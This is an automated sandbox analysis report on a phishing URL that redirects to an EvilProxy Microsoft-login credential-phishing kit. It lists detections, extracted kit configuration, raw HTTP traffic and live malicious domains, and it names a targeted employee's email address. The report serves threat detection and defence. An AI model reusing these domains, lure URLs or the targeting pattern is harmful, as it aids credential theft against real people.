Edit tour

Windows Analysis Report
http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t

Overview

General Information

Sample URL:	http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t
Analysis ID:	1587098
Infos:

Detection

EvilProxy, HTMLPhisher

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Found malware configuration

Yara detected Evil Proxy Phishing kit

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML page contains obfuscated javascript

HTML body contains low number of good links

HTML title does not match URL

Invalid T&C link found

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1740 --field-trial-handle=2024,i,7034162612721822103,13615644138870281852,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

Threatname: Evil Proxy

{"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "glalicker@hilcorp.com", "urlx": "script.php", "lmode": "b"}

Yara Signatures

HTML

Source	Rule	Description	Author
0.3.id.script.csv	JoeSecurity_EvilProxy	Yara detected Evil Proxy Phishing kit	Joe Security
3.4.pages.csv	JoeSecurity_EvilProxy	Yara detected Evil Proxy Phishing kit	Joe Security
3.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.3.id.script.csv

Malware Configuration Extractor: Evil Proxy {"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "glalicker@hilcorp.com", "urlx": "script.php", "lmode": "b"}

Phishing

AI detected phishing page

Source: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com

Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'yta1lbtzic.ludomessie.shop' does not match the legitimate domain for Microsoft., The domain 'ludomessie.shop' is unrelated to Microsoft and uses a '.shop' extension, which is unusual for a technology company like Microsoft., The subdomain 'yta1lbtzic' appears random and does not provide any indication of a legitimate Microsoft service., The URL structure and domain name do not align with any known Microsoft services or products. DOM: 2.3.pages.csv

Yara detected Evil Proxy Phishing kit

Source: Yara match	File source: 0.3.id.script.csv, type: HTML
Source: Yara match	File source: 3.4.pages.csv, type: HTML

Yara detected HtmlPhish10

Source: Yara match

File source: 3.4.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: http://abdullaksa.com/fetching//index.xml#?email=Z... This script demonstrates several high-risk behaviors, including dynamic code execution (via `atob` function), data exfiltration (sending user email to an external domain), and redirects to a suspicious domain. The use of a base64-encoded email parameter and the redirection after a short delay further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://yta1lbtzic.ludomessie.shop/?email=glalicke... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval`, `Function` constructor, and aggressive DOM manipulation indicate potential malicious intent. Additionally, the script sets a cookie and redirects the user to an unknown location, which raises further concerns. While some contextual factors, such as the use of a modal dialog, may suggest legitimate functionality, the overall behavior of this script is highly suspicious and poses a significant security risk.
Source: 0.3.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote or dynamic code, which poses a significant security risk. It also sends sensitive data, such as user information and session identifiers, to external servers, which could lead to data breaches. Additionally, the script uses heavily obfuscated code and URLs, making it difficult to analyze and understand its true purpose. These factors, combined with the suspicious nature of the script's behavior, indicate a high risk of malicious intent.

HTML page contains obfuscated javascript

Source: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com

HTTP Parser: var _0x17d0bb=_0x4400;function _0x4400(_0x33d568,_0x56aee1){var _0x28f930=_0x1e42();return _0x4

Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm

HTTP Parser: Number of links: 0

Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm

HTTP Parser: Title: 1SUFWJLFF38GKWU124BA does not match URL

Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm	HTTP Parser: Invalid link: Terms of use
Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm	HTTP Parser: Invalid link: Privacy & cookies

Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm

HTTP Parser: No <meta name="author".. found

Source: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm

HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 09 Jan 2025 22:30:09 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 10 Jun 2024 16:45:42 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 113Keep-Alive: timeout=5, max=75Content-Type: application/xmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8b 41 0e 40 30 14 05 f7 12 77 68 fe 9e b2 b3 50 76 4e c0 09 f4 a1 49 b5 d2 fe 48 7b 7b c4 6e 32 99 e9 c7 74 5a 71 23 44 e3 9d a2 b6 6e 48 c0 ad 5e 1b b7 2b 5a e6 a9 ea 68 1c ca a2 ff ba 2a 72 b6 88 07 c0 82 f3 05 45 8c c4 32 45 4b e2 08 d8 14 19 a7 91 ea 57 f0 7f 05 ef 59 be f0 00 41 ae 4c 9f 67 00 00 00 Data Ascii: %A@0whPvNIH{{n2tZq#DnH^+Zh*rE2EKWYALg

Source: global traffic	HTTP traffic detected: GET /?email=glalicker@hilcorp.com HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://abdullaksa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?email=glalicker@hilcorp.com HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1
Source: global traffic	HTTP traffic detected: GET /m/dce3ee7580372d088fc5eba68266f598.htm HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/cxx/IX9HZ4SHDYP35GCKXCU0FK5LD HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/sm/YEGUW1WZ86VSGF4U8HGDSSDYB HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/jx/I1DG3RMJL00LK2CD7OY4FD1R6 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/mxl/mlg.svg?96T28VKXHF81R7WIH0I9JK813 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/mxl/mlg.svg?96T28VKXHF81R7WIH0I9JK813 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/aty/XSQZV8DIZUPYQ33UUIAS6TR2C HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/bxg/ZQFETUCJ4MFF4FUB31FABJSBQ HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/jx/I1DG3RMJL00LK2CD7OY4FD1R6 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/ic/1A9TC07ARGDSH4FIUU63X4WA8 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /m/ic/1A9TC07ARGDSH4FIUU63X4WA8 HTTP/1.1Host: yta1lbtzic.ludomessie.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8783c7f788ef34a17e627e7827c7c2c4; preload=1; rt=dce3ee7580372d088fc5eba68266f598.htm
Source: global traffic	HTTP traffic detected: GET /fetching//index.xml HTTP/1.1Host: abdullaksa.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fetching//index.xslt HTTP/1.1Host: abdullaksa.comConnection: keep-aliveAccept: text/css,/;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Referer: http://abdullaksa.com/fetching//index.xmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: abdullaksa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://abdullaksa.com/fetching//index.xmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: abdullaksa.com
Source: global traffic	DNS traffic detected: DNS query: yta1lbtzic.ludomessie.shop
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 22:30:09 GMTServer: ApacheLast-Modified: Sun, 02 Oct 2022 17:29:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Keep-Alive: timeout=5, max=73Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66

Source: chromecache_66.1.dr	String found in binary or memory: https://acctcdn.msauth.net/images/clear1x1.png
Source: chromecache_62.1.dr, chromecache_59.1.dr, chromecache_64.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_62.1.dr, chromecache_59.1.dr, chromecache_64.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_59.1.dr, chromecache_64.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_69.1.dr	String found in binary or memory: https://yta1lbtzic.ludomessie.shop/?email=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
